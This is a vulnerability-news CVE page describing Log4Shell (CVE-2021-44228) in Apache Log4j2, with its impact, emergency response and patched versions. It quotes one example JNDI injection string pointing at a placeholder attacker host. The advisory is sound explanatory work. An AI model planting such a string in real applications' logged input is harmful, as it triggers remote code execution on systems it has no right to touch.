Skip to content
feed: live about
>_ 0dayNews
CVE Record
[ CRITICAL ] CVE-2021-44228

Log4Shell — Apache Log4j2 Remote Code Execution

A critical remote-code-execution vulnerability in Apache Log4j2, the ubiquitous Java logging library, allows an unauthenticated attacker to execute arbitrary code simply by getting a string they control logged — via JNDI lookup injection. One of the most widely exploited vulnerabilities in internet history due to Log4j's near-universal presence in Java applications.

cat cve-2021-44228.json
Vendor
Apache
Product
Log4j2
CVSS
10.0
Status
kev
Published

CVE-2021-44228 — “Log4Shell” — is a maximum-severity (CVSS 10.0) remote-code-execution vulnerability in Apache Log4j2, disclosed on December 10, 2021. Log4j2’s message-lookup substitution feature would resolve JNDI (Java Naming and Directory Interface) strings embedded in logged input, including strings an attacker fully controlled — a chat message, a User-Agent header, a username field. A malicious ${jndi:ldap://attacker.com/a} string, once logged, could cause the target application to fetch and execute attacker-controlled Java code.

Why it mattered

Log4j2 is embedded, directly or transitively, in an enormous share of Java software — enterprise applications, cloud platforms, games (Minecraft’s exploitation was one of the first public demonstrations), and countless internal tools most organizations didn’t even know depended on it. The combination of trivial exploitation, no authentication requirement, and near-universal deployment made this one of the broadest single-vulnerability exploitation events ever recorded, with mass internet scanning for vulnerable endpoints beginning within hours of disclosure.

CISA and international CERT agencies issued emergency directives; the vulnerability was added to the KEV catalog immediately. The Apache Logging Services team shipped Log4j 2.15.0 as an initial fix, followed rapidly by 2.16.0 and 2.17.x after further related issues (CVE-2021-45046, CVE-2021-45105) were found in the original patch. Full remediation guidance is at Apache’s security page and the NVD link above.